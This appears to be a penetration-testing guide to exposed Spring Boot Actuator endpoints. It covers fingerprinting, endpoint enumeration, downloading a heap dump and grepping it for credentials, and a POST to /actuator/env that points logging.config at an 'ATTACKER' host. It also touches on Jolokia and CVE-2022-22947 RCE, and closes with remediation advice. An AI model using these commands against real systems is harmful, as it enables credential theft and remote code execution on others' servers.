Spring Boot Actuator
Spring Boot Actuator adds "production-ready" HTTP endpoints to a Spring Boot application for monitoring and managing it. They live under the base path /actuator by default. When they are exposed to untrusted networks (common misconfiguration: management.endpoints.web.exposure.include=*), they leak secrets, expose internals, and in some cases allow direct remote code execution or a full application shutdown.
An Actuator that exposes only /actuator/heapdump is still a complete compromise - the JVM heap holds database credentials, API keys and live session tokens.
Detecting Spring Boot
X-Application-Contextresponse header.- A "Whitelabel Error Page" on an unknown route, or JSON errors shaped
{"timestamp","status","error","path"}. Spring/Tomcatstack traces.- Cookie
JSESSIONID. - Maven/Gradle build strings in errors.
Listing Exposed Endpoints
Request the base path (no trailing slash) to read the _links map of what is enabled:
curl -s http://TARGET/actuator
# {"_links":{"self":{...},"heapdump":{"href":"http://TARGET/actuator/heapdump",...}}}
If /actuator is 404, brute the common endpoint names anyway.
Interesting Actuator Endpoints
| Endpoint | Method | Why it matters |
|---|---|---|
/actuator/heapdump | GET | Full JVM heap → plaintext credentials, tokens, keys |
/actuator/env | GET/POST | All environment variables + properties (secrets, masked values) |
/actuator/configprops | GET | @ConfigurationProperties beans (data sources, URLs) |
/actuator/beans | GET | All Spring beans, incl. DataSource/HikariDataSource |
/actuator/mappings | GET | Every route the app exposes (hidden/internal endpoints) |
/actuator/loggers | GET/POST | Read/change log levels (set TRACE to leak data) |
/actuator/logfile | GET | Tail the application log file |
/actuator/httptrace (or /httpexchanges) | GET | Recent HTTP requests - may include Authorization headers |
/actuator/threaddump | GET | Thread stacks - in-flight request data |
/actuator/sessions | GET | Session IDs → session hijack |
/actuator/shutdown | POST | Shuts the app down (availability impact) |
/actuator/jolokia | GET/POST | Jolokia JMX bridge → MBean invocation |
/actuator/gateway/* | - | Spring Cloud Gateway routes (CVE-2022-22947 SpEL RCE) |
Retrieving Secrets from /actuator/heapdump
The heap dump is a raw JVM memory image. Grab it and mine it for secrets:
curl -s http://TARGET/actuator/heapdump -o heap.hprof # can be 100 MB+
file heap.hprof # "Java HPROF dump"
strings -n 6 heap.hprof > heap.txt
Hunt for credentials and infrastructure:
# JDBC URLs and datasource config
grep -aoE 'jdbc:[a-zA-Z0-9:./?=&_%-]+' heap.txt | sort -u
# Passwords, tokens, keys, brokers
grep -aiE 'password|secret|apikey|token|datasource|hikari|bootstrap-servers' heap.txt | sort -u
# Spring config keys
grep -aoE '(spring\.|server\.|management\.)[a-zA-Z0-9._-]+' heap.txt | sort -u
The heap also retains the app's own config classes with their constant values next to the property names. Locate the class, then dump that region:
grep -abo 'com.example.config.DataSourceConfig' heap.hprof # -> offset
dd if=heap.hprof bs=1 skip=$((offset-300)) count=900 | strings -n 3
That reliably prints hardcoded usernames, passwords, JDBC URLs and env-var names (DB_USERNAME, DB_PASSWORD, DB_JDBC_URL).
/actuator/env and Property Override (older Spring Boot)
/actuator/env lists property sources; values are masked only if the property name is in management.endpoints.env.keys-to-sanitize. Use /actuator/env/<propertyName> for the raw value. On Spring Boot < 2.6.5, POST /actuator/env can set a property at runtime - historically chained into logback/JNDI and config-poisoning attacks:
curl -s -X POST http://TARGET/actuator/env \
-H 'Content-Type: application/json' \
-d '{"name":"logging.config","value":"http://ATTACKER/logback.xml"}'
Jolokia
If /actuator/jolokia is present, it bridges to JMX. Enumerate MBeans, then invoke operations - a classic RCE primitive when combined with a logging or JNDI MBean:
curl -s http://TARGET/actuator/jolokia/list
curl -s http://TARGET/actuator/jolokia/exec/<mbean>/<operation>
Spring Cloud Gateway Actuator (CVE-2022-22947)
If /actuator/gateway is exposed, routes can be added that contain a SpEL expression → unauthenticated RCE. This is a very high-value find; check the Spring Cloud Gateway version.
Remediation / Secure Coding
Do not expose Actuator endpoints to untrusted networks. This is the primary fix.
- Minimal exposure - only enable what is needed, never
*:management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=heapdump,env,beans,configprops,threaddump,httptrace,shutdown,jolokia - Separate management port bound to localhost / an internal interface, hidden behind the firewall:
management.server.port=9090
management.server.address=127.0.0.1 - Secure it with Spring Security - require an admin role for
/actuator/**; never ship Actuator unauthenticated in production. - Disable dangerous endpoints by default (
shutdown,heapdump,env,jolokia) and sanitise env keys. - Never hardcode secrets in the app or config - use a secret manager / injected env vars. This blunts heapdump impact.
- Keep Spring Boot patched - CVE-2022-22947 (Gateway Actuator RCE) and the env-override issues are fixed in current versions.
- Monitor/alert on access to
/actuator/**; a single hit to/actuator/heapdumpis a strong intrusion signal.